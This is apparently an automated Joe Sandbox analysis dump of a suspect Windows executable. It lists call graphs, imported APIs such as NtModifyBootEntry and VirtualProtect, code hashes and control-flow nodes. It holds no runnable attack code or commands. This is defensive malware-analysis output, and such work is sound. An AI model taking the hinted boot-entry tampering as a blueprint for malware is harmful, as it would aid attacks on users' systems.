4188->4189 4190 7ff7794e15a3 4189->4190 4191 7ff7794e1394 2 API calls 4190->4191 4192 7ff7794e15a8 4191->4192 4193 7ff7794e1394 2 API calls 4192->4193 4194 7ff7794e15b7 4193->4194 4195 7ff7794e1394 2 API calls 4194->4195 4196 7ff7794e15c6 4195->4196 4197 7ff7794e1394 2 API calls 4196->4197 4198 7ff7794e15d5 4197->4198 4199 7ff7794e15e4 4198->4199 4200 7ff7794e1394 2 API calls 4198->4200 4201 7ff7794e1394 2 API calls 4199->4201 4200->4199 4202 7ff7794e15f3 4201->4202 4202->3710 4204 7ff7794e1394 2 API calls 4203->4204 4205 7ff7794e14c7 4204->4205 4206 7ff7794e1394 2 API calls 4205->4206 4207 7ff7794e14d6 4206->4207 4208 7ff7794e14e5 4207->4208 4209 7ff7794e1394 2 API calls 4207->4209 4210 7ff7794e1394 2 API calls 4208->4210 4209->4208 4211 7ff7794e14ef 4210->4211 4212 7ff7794e14f4 4211->4212 4213 7ff7794e1394 2 API calls 4211->4213 4214 7ff7794e1394 2 API calls 4212->4214 4213->4212 4215 7ff7794e14fe 4214->4215 4216 7ff7794e1394 2 API calls 4215->4216 4217 7ff7794e1503 4216->4217 4218 7ff7794e1512 4217->4218 4219 7ff7794e1394 2 API calls 4217->4219 4220 7ff7794e1394 2 API calls 4218->4220 4219->4218 4221 7ff7794e1521 4220->4221 4222 7ff7794e1394 2 API calls 4221->4222 4223 7ff7794e152b 4222->4223 4224 7ff7794e1530 4223->4224 4225 7ff7794e1394 2 API calls 4223->4225 4226 7ff7794e1394 2 API calls 4224->4226 4225->4224 4227 7ff7794e153a 4226->4227 4228 7ff7794e153f 4227->4228 4229 7ff7794e1394 2 API calls 4227->4229 4230 7ff7794e1394 2 API calls 4228->4230 4229->4228 4231 7ff7794e154e 4230->4231 4232 7ff7794e1394 2 API calls 4231->4232 4233 7ff7794e1558 4232->4233 4234 7ff7794e155d 4233->4234 4235 7ff7794e1394 2 API calls 4233->4235 4236 7ff7794e1394 2 API calls 4234->4236 4235->4234 4237 7ff7794e1567 4236->4237 4238 7ff7794e156c 4237->4238 4239 7ff7794e1394 2 API calls 4237->4239 4240 7ff7794e1394 2 API calls 4238->4240 4239->4238 4241 7ff7794e1576 4240->4241 4242 7ff7794e157b 4241->4242 4243 7ff7794e1394 2 API calls 4241->4243 4244 7ff7794e1394 2 API calls 4242->4244 4243->4242 4245 7ff7794e1585 4244->4245 4246 7ff7794e158a 4245->4246 4247 7ff7794e1394 2 API calls 4245->4247 4248 7ff7794e1394 2 API calls 4246->4248 4247->4246 4249 7ff7794e1599 4248->4249 4250 7ff7794e1394 2 API calls 4249->4250 4251 7ff7794e15a3 4250->4251 4252 7ff7794e1394 2 API calls 4251->4252 4253 7ff7794e15a8 4252->4253 4254 7ff7794e1394 2 API calls 4253->4254 4255 7ff7794e15b7 4254->4255 4256 7ff7794e1394 2 API calls 4255->4256 4257 7ff7794e15c6 4256->4257 4258 7ff7794e1394 2 API calls 4257->4258 4259 7ff7794e15d5 4258->4259 4260 7ff7794e15e4 4259->4260 4261 7ff7794e1394 2 API calls 4259->4261 4262 7ff7794e1394 2 API calls 4260->4262 4261->4260 4263 7ff7794e15f3 4262->4263 4263->3788 4265 7ff7794e15e4 4264->4265 4266 7ff7794e1394 2 API calls 4264->4266 4267 7ff7794e1394 2 API calls 4265->4267 4266->4265 4268 7ff7794e15f3 4267->4268 4268->3788 4270 7ff7794e1394 2 API calls 4269->4270 4271 7ff7794e1495 4270->4271 4272 7ff7794e1394 2 API calls 4271->4272 4273 7ff7794e149a 4272->4273 4274 7ff7794e1394 2 API calls 4273->4274 4275 7ff7794e14a9 4274->4275 4276 7ff7794e1394 2 API calls 4275->4276 4277 7ff7794e14b8 4276->4277 4278 7ff7794e1394 2 API calls 4277->4278 4279 7ff7794e14c7 4278->4279 4280 7ff7794e1394 2 API calls 4279->4280 4281 7ff7794e14d6 4280->4281 4282 7ff7794e14e5 4281->4282 4283 7ff7794e1394 2 API calls 4281->4283 4284 7ff7794e1394 2 API calls 4282->4284 4283->4282 4285 7ff7794e14ef 4284->4285 4286 7ff7794e14f4 4285->4286 4287 7ff7794e1394 2 API calls 4285->4287 4288 7ff7794e1394 2 API calls 4286->4288 4287->4286 4289 7ff7794e14fe 4288->4289 4290 7ff7794e1394 2 API calls 4289->4290 4291 7ff7794e1503 4290->4291 4292 7ff7794e1512 4291->4292 4293 7ff7794e1394 2 API calls 4291->4293 4294 7ff7794e1394 2 API calls 4292->4294 4293->4292 4295 7ff7794e1521 4294->4295 4296 7ff7794e1394 2 API calls 4295->4296 4297 7ff7794e152b 4296->4297 4298 7ff7794e1530 4297->4298 4299 7ff7794e1394 2 API calls 4297->4299 4300 7ff7794e1394 2 API calls 4298->4300 4299->4298 4301 7ff7794e153a 4300->4301 4302 7ff7794e153f 4301->4302 4303 7ff7794e1394 2 API calls 4301->4303 4304 7ff7794e1394 2 API calls 4302->4304 4303->4302 4305 7ff7794e154e 4304->4305 4306 7ff7794e1394 2 API calls 4305->4306 4307 7ff7794e1558 4306->4307 4308 7ff7794e155d 4307->4308 4309 7ff7794e1394 2 API calls 4307->4309 4310 7ff7794e1394 2 API calls 4308->4310 4309->4308 4311 7ff7794e1567 4310->4311 4312 7ff7794e156c 4311->4312 4313 7ff7794e1394 2 API calls 4311->4313 4314 7ff7794e1394 2 API calls 4312->4314 4313->4312 4315 7ff7794e1576 4314->4315 4316 7ff7794e157b 4315->4316 4317 7ff7794e1394 2 API calls 4315->4317 4318 7ff7794e1394 2 API calls 4316->4318 4317->4316 4319 7ff7794e1585 4318->4319 4320 7ff7794e158a 4319->4320 4321 7ff7794e1394 2 API calls 4319->4321 4322 7ff7794e1394 2 API calls 4320->4322 4321->4320 4323 7ff7794e1599 4322->4323 4324 7ff7794e1394 2 API calls 4323->4324 4325 7ff7794e15a3 4324->4325 4326 7ff7794e1394 2 API calls 4325->4326 4327 7ff7794e15a8 4326->4327 4328 7ff7794e1394 2 API calls 4327->4328 4329 7ff7794e15b7 4328->4329 4330 7ff7794e1394 2 API calls 4329->4330 4331 7ff7794e15c6 4330->4331 4332 7ff7794e1394 2 API calls 4331->4332 4333 7ff7794e15d5 4332->4333 4334 7ff7794e15e4 4333->4334 4335 7ff7794e1394 2 API calls 4333->4335 4336 7ff7794e1394 2 API calls 4334->4336 4335->4334 4337 7ff7794e15f3 4336->4337 4337->3787 4338 7ff7794e149a 4337->4338 4339 7ff7794e1394 2 API calls 4338->4339 4340 7ff7794e14a9 4339->4340 4341 7ff7794e1394 2 API calls 4340->4341 4342 7ff7794e14b8 4341->4342 4343 7ff7794e1394 2 API calls 4342->4343 4344 7ff7794e14c7 4343->4344 4345 7ff7794e1394 2 API calls 4344->4345 4346 7ff7794e14d6 4345->4346 4347 7ff7794e14e5 4346->4347 4348 7ff7794e1394 2 API calls 4346->4348 4349 7ff7794e1394 2 API calls 4347->4349 4348->4347 4350 7ff7794e14ef 4349->4350 4351 7ff7794e14f4 4350->4351 4352 7ff7794e1394 2 API calls 4350->4352 4353 7ff7794e1394 2 API calls 4351->4353 4352->4351 4354 7ff7794e14fe 4353->4354 4355 7ff7794e1394 2 API calls 4354->4355 4356 7ff7794e1503 4355->4356 4357 7ff7794e1512 4356->4357 4358 7ff7794e1394 2 API calls 4356->4358 4359 7ff7794e1394 2 API calls 4357->4359 4358->4357 4360 7ff7794e1521 4359->4360 4361 7ff7794e1394 2 API calls 4360->4361 4362 7ff7794e152b 4361->4362 4363 7ff7794e1530 4362->4363 4364 7ff7794e1394 2 API calls 4362->4364 4365 7ff7794e1394 2 API calls 4363->4365 4364->4363 4366 7ff7794e153a 4365->4366 4367 7ff7794e153f 4366->4367 4368 7ff7794e1394 2 API calls 4366->4368 4369 7ff7794e1394 2 API calls 4367->4369 4368->4367 4370 7ff7794e154e 4369->4370 4371 7ff7794e1394 2 API calls 4370->4371 4372 7ff7794e1558 4371->4372 4373 7ff7794e155d 4372->4373 4374 7ff7794e1394 2 API calls 4372->4374 4375 7ff7794e1394 2 API calls 4373->4375 4374->4373 4376 7ff7794e1567 4375->4376 4377 7ff7794e156c 4376->4377 4378 7ff7794e1394 2 API calls 4376->4378 4379 7ff7794e1394 2 API calls 4377->4379 4378->4377 4380 7ff7794e1576 4379->4380 4381 7ff7794e157b 4380->4381 4382 7ff7794e1394 2 API calls 4380->4382 4383 7ff7794e1394 2 API calls 4381->4383 4382->4381 4384 7ff7794e1585 4383->4384 4385 7ff7794e158a 4384->4385 4386 7ff7794e1394 2 API calls 4384->4386 4387 7ff7794e1394 2 API calls 4385->4387 4386->4385 4388 7ff7794e1599 4387->4388 4389 7ff7794e1394 2 API calls 4388->4389 4390 7ff7794e15a3 4389->4390 4391 7ff7794e1394 2 API calls 4390->4391 4392 7ff7794e15a8 4391->4392 4393 7ff7794e1394 2 API calls 4392->4393 4394 7ff7794e15b7 4393->4394 4395 7ff7794e1394 2 API calls 4394->4395 4396 7ff7794e15c6 4395->4396 4397 7ff7794e1394 2 API calls 4396->4397 4398 7ff7794e15d5 4397->4398 4399 7ff7794e15e4 4398->4399 4400 7ff7794e1394 2 API calls 4398->4400 4401 7ff7794e1394 2 API calls 4399->4401 4400->4399 4402 7ff7794e15f3 4401->4402 4402->3787 4402->3792 4404 7ff7794e1394 2 API calls 4403->4404 4405 7ff7794e1486 4404->4405 4406 7ff7794e148b 4405->4406 4407 7ff7794e1394 2 API calls 4405->4407 4408 7ff7794e1394 2 API calls 4406->4408 4407->4406 4409 7ff7794e1495 4408->4409 4410 7ff7794e1394 2 API calls 4409->4410 4411 7ff7794e149a 4410->4411 4412 7ff7794e1394 2 API calls 4411->4412 4413 7ff7794e14a9 4412->4413 4414 7ff7794e1394 2 API calls 4413->4414 4415 7ff7794e14b8 4414->4415 4416 7ff7794e1394 2 API calls 4415->4416 4417 7ff7794e14c7 4416->4417 4418 7ff7794e1394 2 API calls 4417->4418 4419 7ff7794e14d6 4418->4419 4420 7ff7794e14e5 4419->4420 4421 7ff7794e1394 2 API calls 4419->4421 4422 7ff7794e1394 2 API calls 4420->4422 4421->4420 4423 7ff7794e14ef 4422->4423 4424 7ff7794e14f4 4423->4424 4425 7ff7794e1394 2 API calls 4423->4425 4426 7ff7794e1394 2 API calls 4424->4426 4425->4424 4427 7ff7794e14fe 4426->4427 4428 7ff7794e1394 2 API calls 4427->4428 4429 7ff7794e1503 4428->4429 4430 7ff7794e1512 4429->4430 4431 7ff7794e1394 2 API calls 4429->4431 4432 7ff7794e1394 2 API calls 4430->4432 4431->4430 4433 7ff7794e1521 4432->4433 4434 7ff7794e1394 2 API calls 4433->4434 4435 7ff7794e152b 4434->4435 4436 7ff7794e1530 4435->4436 4437 7ff7794e1394 2 API calls 4435->4437 4438 7ff7794e1394 2 API calls 4436->4438 4437->4436 4439 7ff7794e153a 4438->4439 4440 7ff7794e153f 4439->4440 4441 7ff7794e1394 2 API calls 4439->4441 4442 7ff7794e1394 2 API calls 4440->4442 4441->4440 4443 7ff7794e154e 4442->4443 4444 7ff7794e1394 2 API calls 4443->4444 4445 7ff7794e1558 4444->4445 4446 7ff7794e155d 4445->4446 4447 7ff7794e1394 2 API calls 4445->4447 4448 7ff7794e1394 2 API calls 4446->4448 4447->4446 4449 7ff7794e1567 4448->4449 4450 7ff7794e156c 4449->4450 4451 7ff7794e1394 2 API calls 4449->4451 4452 7ff7794e1394 2 API calls 4450->4452 4451->4450 4453 7ff7794e1576 4452->4453 4454 7ff7794e157b 4453->4454 4455 7ff7794e1394 2 API calls 4453->4455 4456 7ff7794e1394 2 API calls 4454->4456 4455->4454 4457 7ff7794e1585 4456->4457 4458 7ff7794e158a 4457->4458 4459 7ff7794e1394 2 API calls 4457->4459 4460 7ff7794e1394 2 API calls 4458->4460 4459->4458 4461 7ff7794e1599 4460->4461 4462 7ff7794e1394 2 API calls 4461->4462 4463 7ff7794e15a3 4462->4463 4464 7ff7794e1394 2 API calls 4463->4464 4465 7ff7794e15a8 4464->4465 4466 7ff7794e1394 2 API calls 4465->4466 4467 7ff7794e15b7 4466->4467 4468 7ff7794e1394 2 API calls 4467->4468 4469 7ff7794e15c6 4468->4469 4470 7ff7794e1394 2 API calls 4469->4470 4471 7ff7794e15d5 4470->4471 4472 7ff7794e15e4 4471->4472 4473 7ff7794e1394 2 API calls 4471->4473 4474 7ff7794e1394 2 API calls 4472->4474 4473->4472 4475 7ff7794e15f3 4474->4475 4475->3797 4477 7ff7794e1394 2 API calls 4476->4477 4478 7ff7794e15d5 4477->4478 4479 7ff7794e15e4 4478->4479 4480 7ff7794e1394 2 API calls 4478->4480 4481 7ff7794e1394 2 API calls 4479->4481 4480->4479 4482 7ff7794e15f3 4481->4482 4482->3778 4525 7ff7794e1000 4526 7ff7794e108b __set_app_type 4525->4526 4527 7ff7794e1040 4525->4527 4528 7ff7794e10b6 4526->4528 4527->4526 4529 7ff7794e10e5 4528->4529 4531 7ff7794e1e00 4528->4531 4532 7ff7794e7ce0 __setusermatherr 4531->4532 4533 7ff7794e1800 4534 7ff7794e1812 4533->4534 4535 7ff7794e1835 fprintf 4534->4535 4544 7ff7794e2320 strlen 4545 7ff7794e2337 4544->4545 4546 7ff7794e219e 4547 7ff7794e2272 4546->4547 4548 7ff7794e21ab EnterCriticalSection 4546->4548 4549 7ff7794e2265 LeaveCriticalSection 4548->4549 4551 7ff7794e21c8 4548->4551 4549->4547 4550 7ff7794e21e9 TlsGetValue GetLastError 4550->4551 4551->4549 4551->4550

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 1f0c5cd89db2a0e226b3a7e11c31de7610b439b18b75d8784ee5a5e0c905799d
                                                        • Instruction ID: d76abe55e35c1cf91193db5e6863e05f19794d4fb5b2554d4cdcd4b09dd7d989
                                                        • Opcode Fuzzy Hash: 1f0c5cd89db2a0e226b3a7e11c31de7610b439b18b75d8784ee5a5e0c905799d
                                                        • Instruction Fuzzy Hash: 1B514533E7B68784FA10FF16E95427AA2B0BF4D794F844471C94D877A2DE2CA881C360

                                                        Control-flow Graph

                                                        APIs
                                                        • NtModifyBootEntry.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7794E1156), ref: 00007FF7794E13F7
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: BootEntryModify
                                                        • String ID:
                                                        • API String ID: 1917533178-0
                                                        • Opcode ID: 6acfa36f2e860ca0d1eeb73f57069e439c4ee3338a0405080f720feb056bc57f
                                                        • Instruction ID: 3343852688e19c7a15b103e3578a79f6047d7965cd97265d668677129a23c545
                                                        • Opcode Fuzzy Hash: 6acfa36f2e860ca0d1eeb73f57069e439c4ee3338a0405080f720feb056bc57f
                                                        • Instruction Fuzzy Hash: B5F0C97392AB4282D610EF52F88006BB7B1FB58398B404935E98C43725CF3CE950CB60

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 8bf03da8fde18c3f48384b70ec27093f30c1343604dedd7ca0a9661a927418a4
                                                        • Instruction ID: 6d2f39b545859e5b542c8ef3b7fc8e1c5a06147e64db9206fb71aed234b1b163
                                                        • Opcode Fuzzy Hash: 8bf03da8fde18c3f48384b70ec27093f30c1343604dedd7ca0a9661a927418a4
                                                        • Instruction Fuzzy Hash: 37B16C229396C385E721EF26E4453ABB7B0FB85788F800235EA8852A95DF7DD185CB50

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 01488000d68a8ab59d04e6865e1b22ecddd291ab305485b4cbbe7ecfcb7ac9ad
                                                        • Instruction ID: c2da06303966fdb80f4afac50f02d038f772fa6999b6a1f253d64da69849da63
                                                        • Opcode Fuzzy Hash: 01488000d68a8ab59d04e6865e1b22ecddd291ab305485b4cbbe7ecfcb7ac9ad
                                                        • Instruction Fuzzy Hash: CF026B33939B8285E721EF15E8443AAB7B4FB897A4F804225DA9C43BA5EF3CD145C750

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF7794E93E8,00007FF7794E93E8,?,?,00007FF7794E0000,?,00007FF7794E1991), ref: 00007FF7794E1C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF7794E93E8,00007FF7794E93E8,?,?,00007FF7794E0000,?,00007FF7794E1991), ref: 00007FF7794E1CC7
                                                        • memcpy.MSVCRT ref: 00007FF7794E1CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF7794E93E8,00007FF7794E93E8,?,?,00007FF7794E0000,?,00007FF7794E1991), ref: 00007FF7794E1D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 716313809d7e085c12c1575cdce3c3800b6d9d2193e088841cc148fe0cd95883
                                                        • Instruction ID: 5813b33497c71fdd0d439515033a748dc769aa030f99ae0c32246a998a74903e
                                                        • Opcode Fuzzy Hash: 716313809d7e085c12c1575cdce3c3800b6d9d2193e088841cc148fe0cd95883
                                                        • Instruction Fuzzy Hash: 6841A173A3AA4795EA10EF03D8946BAA7B0EB49BC4F944172CD0D87391DE3CE545C360

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 64c81d714b45f07d50bdf4d52e7b3bb64b2b63a861827c6e76927b0b7ee1a192
                                                        • Instruction ID: a9375c154e6e2d3562bf9e0c3291a223bcf38705732164c5a000676af8a43575
                                                        • Opcode Fuzzy Hash: 64c81d714b45f07d50bdf4d52e7b3bb64b2b63a861827c6e76927b0b7ee1a192
                                                        • Instruction Fuzzy Hash: D721C733A3B90381FA59EF02E955276A270BF08BD4FC40178C90E57AA0DF6CA946C360

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 592 7ff7794e1e10-7ff7794e1e2d 593 7ff7794e1e2f-7ff7794e1e38 592->593 594 7ff7794e1e3e-7ff7794e1e48 592->594 593->594 595 7ff7794e1f60-7ff7794e1f69 593->595 596 7ff7794e1ea3-7ff7794e1ea8 594->596 597 7ff7794e1e4a-7ff7794e1e53 594->597 596->595 600 7ff7794e1eae-7ff7794e1eb3 596->600 598 7ff7794e1e55-7ff7794e1e60 597->598 599 7ff7794e1ecc-7ff7794e1ed1 597->599 598->596 601 7ff7794e1f23-7ff7794e1f2d 599->601 602 7ff7794e1ed3-7ff7794e1ee2 signal 599->602 603 7ff7794e1eb5-7ff7794e1eba 600->603 604 7ff7794e1efb-7ff7794e1f0a call 7ff7794e7cf0 600->604 605 7ff7794e1f43-7ff7794e1f45 601->605 606 7ff7794e1f2f-7ff7794e1f3f 601->606 602->601 607 7ff7794e1ee4-7ff7794e1ee8 602->607 603->595 609 7ff7794e1ec0 603->609 604->601 614 7ff7794e1f0c-7ff7794e1f10 604->614 605->595 613 7ff7794e1f5a 606->613 610 7ff7794e1f4e-7ff7794e1f53 607->610 611 7ff7794e1eea-7ff7794e1ef9 signal 607->611 609->601 610->613 611->595 613->595 615 7ff7794e1f55 614->615 616 7ff7794e1f12-7ff7794e1f21 signal 614->616 615->613 616->595 616->601
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 2630db6486f5b991bc22551f89febb5c90dbce5cc3ede817fc3e9e42a387646c
                                                        • Instruction ID: 5be628442332e83c6b1b8541831c1270b9c99d05b9ceaebae0b28f6da241d6d7
                                                        • Opcode Fuzzy Hash: 2630db6486f5b991bc22551f89febb5c90dbce5cc3ede817fc3e9e42a387646c
                                                        • Instruction Fuzzy Hash: 36219433EBB10741FA65FA16955037B91B1AF8C7A4FA585B1DD0E473D4CE2CB881C2A0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 617 7ff7794e1880-7ff7794e189c 618 7ff7794e1a0f-7ff7794e1a1f 617->618 619 7ff7794e18a2-7ff7794e18f9 call 7ff7794e2420 call 7ff7794e2660 617->619 619->618 624 7ff7794e18ff-7ff7794e1910 619->624 625 7ff7794e1912-7ff7794e191c 624->625 626 7ff7794e193e-7ff7794e1941 624->626 627 7ff7794e191e-7ff7794e1929 625->627 628 7ff7794e194d-7ff7794e1954 625->628 626->628 629 7ff7794e1943-7ff7794e1947 626->629 627->628 630 7ff7794e192b-7ff7794e193a 627->630 632 7ff7794e1956-7ff7794e1961 628->632 633 7ff7794e199e-7ff7794e19a6 628->633 629->628 631 7ff7794e1a20-7ff7794e1a26 629->631 630->626 634 7ff7794e1a2c-7ff7794e1a37 631->634 635 7ff7794e1b87-7ff7794e1b98 call 7ff7794e1d40 631->635 637 7ff7794e1970-7ff7794e199c call 7ff7794e1ba0 632->637 633->618 636 7ff7794e19a8-7ff7794e19c1 633->636 634->633 638 7ff7794e1a3d-7ff7794e1a5f 634->638 639 7ff7794e19df-7ff7794e19e7 636->639 637->633 643 7ff7794e1a7d-7ff7794e1a97 638->643 644 7ff7794e19d0-7ff7794e19dd 639->644 645 7ff7794e19e9-7ff7794e1a0d VirtualProtect 639->645 647 7ff7794e1b74-7ff7794e1b82 call 7ff7794e1d40 643->647 648 7ff7794e1a9d-7ff7794e1afa 643->648 644->618 644->639 645->644 647->635 654 7ff7794e1b22-7ff7794e1b26 648->654 655 7ff7794e1afc-7ff7794e1b0e 648->655 658 7ff7794e1a70-7ff7794e1a77 654->658 659 7ff7794e1b2c-7ff7794e1b30 654->659 656 7ff7794e1b10-7ff7794e1b20 655->656 657 7ff7794e1b5c-7ff7794e1b6c 655->657 656->654 656->657 657->647 660 7ff7794e1b6f call 7ff7794e1d40 657->660 658->633 658->643 659->658 661 7ff7794e1b36-7ff7794e1b57 call 7ff7794e1ba0 659->661 660->647 661->657
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7794E1247), ref: 00007FF7794E19F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2133549211.00007FF7794E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7794E0000, based on PE: true
                                                        • Associated: 00000010.00000002.2133532717.00007FF7794E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133565576.00007FF7794E8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133582166.00007FF7794EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000010.00000002.2133724617.00007FF779763000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_7ff7794e0000_bbecxurdegum.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 526722fdec3aa6cb244c57f22067a962d7ffc6e2d40cebe4475ac13535e1ccff
                                                        • Instruction ID: 8b40865ef2654d2ad8707605a95318b06b28f8977516d675a393b9056ce5afee
                                                        • Opcode Fuzzy Hash: 526722fdec3aa6cb244c57f22067a962d7ffc6e2d40cebe4475ac13535e1ccff
                                                        • Instruction Fuzzy Hash: 3B516D73E7A587D6EB10EF22D8447BAA771AB18B98F844231D91C07794DE3CE985C720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 7ff7794e1800-7ff7794e1810 666 7ff7794e1824 665->666 667 7ff7794e1812-7ff7794e1822 665->667 668 7ff7794e182b-7ff7794e1867 call 7ff7794e2290 fprintf 666->668 667->668
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
